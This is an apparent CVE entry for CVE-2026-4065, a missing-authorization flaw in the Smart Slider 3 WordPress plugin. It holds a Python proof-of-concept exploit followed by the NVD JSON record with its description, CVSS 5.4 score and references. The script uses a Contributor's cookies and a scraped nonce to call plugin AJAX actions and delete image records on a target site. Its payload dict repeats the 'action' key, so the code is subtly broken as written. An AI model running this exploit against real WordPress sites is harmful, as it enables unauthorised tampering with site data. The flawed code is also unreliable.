CVE-2026-4065

import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" attacker_cookie = "wordpress_logged_in_xxx=...; wp_sec_xxx=..." # Step 1: Obtain nextend_nonce from the post editor page (simulated here) # In a real attack, scrape this value from /wp-admin/post.php?post=ID&action=edit nextend_nonce = "<OBTAIN_NONCE_FROM_EDITOR>" # Step 2: Prepare payload to delete an image record (example action) payload = { "action": "smartslider3", "nextend_nonce": nextend_nonce, "controller": "image", "action": "delete", "image_id": "1" } headers = { "Cookie": attacker_cookie, "Content-Type": "application/x-www-form-urlencoded" } # Step 3: Send the exploit request response = requests.post(target_url, data=payload, headers=headers) if response.status_code == 200: print("[+] Exploit request sent successfully") print("[+] Response:", response.text) else: print("[-] Exploit failed")

{"cve": {"id": "CVE-2026-4065", "sourceIdentifier": "[email protected]", "published": "2026-04-07T22:16:24.740", "lastModified": "2026-04-27T19:04:22.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Smart Slider 3 plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on multiple wp_ajax_smart-slider3 controller actions in all versions up to, and including, 3.5.1.33. The display_admin_ajax() method does not call checkForCap() (which requires unfiltered_html capability), and several controller actions only validate the nonce (validateToken()) without calling validatePermission(). This makes it possible for authenticated attackers, with Contributor-level access and above, to enumerate slider metadata and create, modify, and delete image storage records by obtaining the nextend_nonce exposed on post editor pages."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/smart-slider-3/tags/3.5.1.32/Nextend/Framework/Image/ControllerAjaxImage.php#L37", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/smart-slider-3/tags/3.5.1.32/Nextend/SmartSlider3/Application/Admin/Sliders/ControllerAjaxSliders.php#L26", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/smart-slider-3/tags/3.5.1.32/Nextend/SmartSlider3/Platform/WordPress/Admin/AdminHelper.php#L155", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/smart-slider-3/tags/3.5.1.32/Nextend/SmartSlider3/Platform/WordPress/HelperTinyMCE.php#L30", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/smart-slider-3/trunk/Nextend/SmartSlider3/Platform/WordPress/Admin/AdminHelper.php#L155", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3489689%40smart-slider-3%2Ftrunk&old=3439582%40smart-slider-3%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/53a08b59-b7e0-419a-bfc3-528bcddb1ac2?source=cve", "source": "[email protected]"}]}}